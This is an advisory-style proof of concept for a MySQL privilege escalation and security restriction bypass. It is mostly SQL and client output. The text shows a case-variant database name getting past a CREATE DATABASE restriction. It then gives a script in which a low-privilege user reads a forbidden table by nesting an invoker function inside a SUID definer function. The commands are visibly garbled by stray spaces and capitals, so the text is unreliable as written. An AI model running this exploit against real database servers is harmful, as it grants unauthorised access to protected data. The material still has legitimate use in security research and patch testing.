MySQL privilege escalation and Security Restriction Bypass Vulnerability
Test method:
[Warning: The following procedures (methods) may be offensive and only used for security research and teaching. Users are at your own risk !]
1. Create a database
$ Mysql-h my. mysql. server-u sample-p-A sample
Enter password:
Welcome to the MySQL monitor. Commands end with; or g.
Your MySQL connection id is 263935 to server version: 4.1.16-standard
Mysql> create database another;
ERROR 1044: Access denied for user 'sample' @ '%' to database 'another'
Mysql> create database sAmple;
Query OK, 1 row affected (0.00 sec)
2. Permission Improvement
-- Disable_warnings
Drop database if exists mysqltest1;
Drop database if exists mysqltest2;
Drop function if exists f_suid;
-- Enable_warnings
# Prepare playground
Create database mysqltest1;
Create database mysqltest2;
Create user malory @ localhost;
Grant all privileges on mysqltest1. * to malory @ localhost;
# Create harmless (but SUID !) Function
Create function f_suid (I int) returns int return 0;
Grant execute on function test. f_suid to malory @ localhost;
Use mysqltest2;
# Create table in which malory @ localhost will be interested but to which
# He won't have any access
Create table t1 (I int );
Connect (malcon, localhost, malory, mysqltest1 );
# Correct malory @ localhost don't have access to mysqltest2.t1
-- Error ER_TABLEACCESS_DENIED_ERROR
Select * from mysqltest2.t1;
# Create function which will allow to exploit security hole
Delimiter |;
Create function f_edevil ()
Returns int
SQL security invoker
Begin
Set @ a: = current_user ();
Set @ B: = (select count (*) from mysqltest2.t1 );
Return 0;
End |
Delimiter; |
# Again correct
-- Error ER_TABLEACCESS_DENIED_ERROR
Select f_edevil ();
Select @ a, @ B;
# Oops !!! It seems that f_edevil () is executed in the context
# F_suid () definer, so malory @ locahost gets all info that he wants
Select test. f_suid (f_edevil ());
Select @ a, @ B;
Connection default;
Drop user malory @ localhost;
Drop database mysqltest1;
Drop database mysqltest2;